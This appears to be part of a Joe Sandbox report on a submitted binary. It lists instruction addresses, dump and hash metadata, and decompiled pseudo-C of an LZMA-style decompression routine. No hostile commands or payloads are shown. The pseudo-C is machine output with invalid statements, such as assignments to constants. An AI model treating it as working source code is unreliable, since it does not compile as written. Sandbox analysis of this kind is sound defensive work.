0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00000000
0x0040676f
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x00000000
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00406811
0x00000000
0x00406686

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
